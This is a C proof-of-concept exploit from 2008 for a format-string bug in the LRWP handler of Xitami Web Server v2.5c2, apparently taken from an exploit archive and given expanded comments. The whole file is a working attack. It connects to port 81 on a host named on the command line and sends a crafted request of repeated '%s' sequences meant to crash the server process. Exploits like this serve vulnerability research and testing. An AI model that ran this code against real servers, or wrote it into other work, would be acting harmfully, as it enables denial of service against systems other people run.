# Title : Xitami Web Server v2.5c2 LRWP Processing Format String PoC
# Published : 2008-04-03
# Author : bratax
/**
*
* PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
* Advisory is available at: http://www.bratax.be/advisories/b013.html
* (multiple vulnerabilities! check it out!)
*
* @author: bratax
* @url: http://www.bratax.be/
* @email: bratax@gmail.com
*
* Thanks to BuzzDee for teaching me how to use reverse code engineering to
* find bugs & thanks to DiabloHorn as well ;-)
* Greetz to NR!
*
**/
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port
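/*
 * Entry point for the PoC.
 *
 * argv[1] is the target hostname or dotted-quad address. The program
 * resolves it, connects to TCP port PORT (81, the LRWP listener) and sends
 * one 250-byte request laid out as:
 *
 *     "%s" * 100  +  0xFF  +  filler  +  0xFF
 *
 * Per the advisory the LRWP handler hands this data to a printf-style call,
 * so the "%s" conversions are dereferenced as pointers and the service
 * terminates; the original author notes that a "%n" in place of the "%s"
 * run is expected to crash it instead. Nothing is read back from the server.
 *
 * Returns 0 once the request has been sent, -1 on a usage or Winsock
 * failure. Every exit path after WSAStartup() releases the socket (when one
 * was opened) and calls WSACleanup(); the original leaked both on the
 * gethostbyname/socket/connect error paths and on success.
 *
 * Run only against a host you are authorised to test: the request is
 * designed to take the target process down.
 */
int main(int argc, char *argv[]){
    enum { REQ_LEN = 250, FMT_END = 200 };   /* request size; end of the "%s" run */
    int rc = -1;
    int sockfd = -1;
    struct hostent *he;
    struct sockaddr_in their_addr;
    WSADATA wsaData;
    char formatstring[REQ_LEN];
    int i;

    if (argc != 2) {
        printf("\nXitami Web Server 2.5c2\n");
        printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
        printf("[+] tested on WinXP Pro SP2 & Vista\n");
        printf("[+] usage: %s <hostname>\n\n", argv[0]);
        return -1;
    }
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
        fprintf(stderr, "WSAStartup failed.\n");
        return -1;
    }
    /* perror() does not see Winsock error codes, so report plainly. */
    if ((he = gethostbyname(argv[1])) == NULL) {
        fprintf(stderr, "[-] gethostbyname failed for %s\n", argv[1]);
        goto cleanup_wsa;
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        fprintf(stderr, "[-] socket failed.\n");
        goto cleanup_wsa;
    }
    /* Zero the whole address instead of only sin_zero. */
    memset(&their_addr, 0, sizeof(their_addr));
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);                       /* network byte order */
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);   /* first resolved address */
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(their_addr)) == -1) {
        printf("[-] Connect failed.\n");
        goto cleanup_sock;
    }
    printf("[+] Server is listening...\n");
    Sleep(1000);

    /*
     * Build the request: "%s" x 100 in bytes 0..199, 0xFF at byte 200,
     * 'A' filler, and 0xFF as the last byte. The buffer is raw bytes, not a
     * C string -- the final 0xFF deliberately replaces any NUL terminator.
     */
    memset(formatstring, 'A', sizeof(formatstring));
    for (i = 0; i < FMT_END; i += 2) {
        memcpy(formatstring + i, "%s", 2);
    }
    formatstring[FMT_END] = (char)0xFF;
    formatstring[REQ_LEN - 1] = (char)0xFF;

    printf("[+] Sending format string request...");
    Sleep(2000);
    /* send() returns -1 (SOCKET_ERROR) on failure; a short send is treated
     * as failure too, since the payload only works when it arrives intact. */
    if (send(sockfd, formatstring, sizeof(formatstring), 0) != (int)sizeof(formatstring)) {
        Sleep(2000);
        printf("failed! Exiting...\n");
        goto cleanup_sock;
    }
    Sleep(2000);
    printf("done.\n");
    rc = 0;

cleanup_sock:
    closesocket(sockfd);
cleanup_wsa:
    WSACleanup();
    return rc;
}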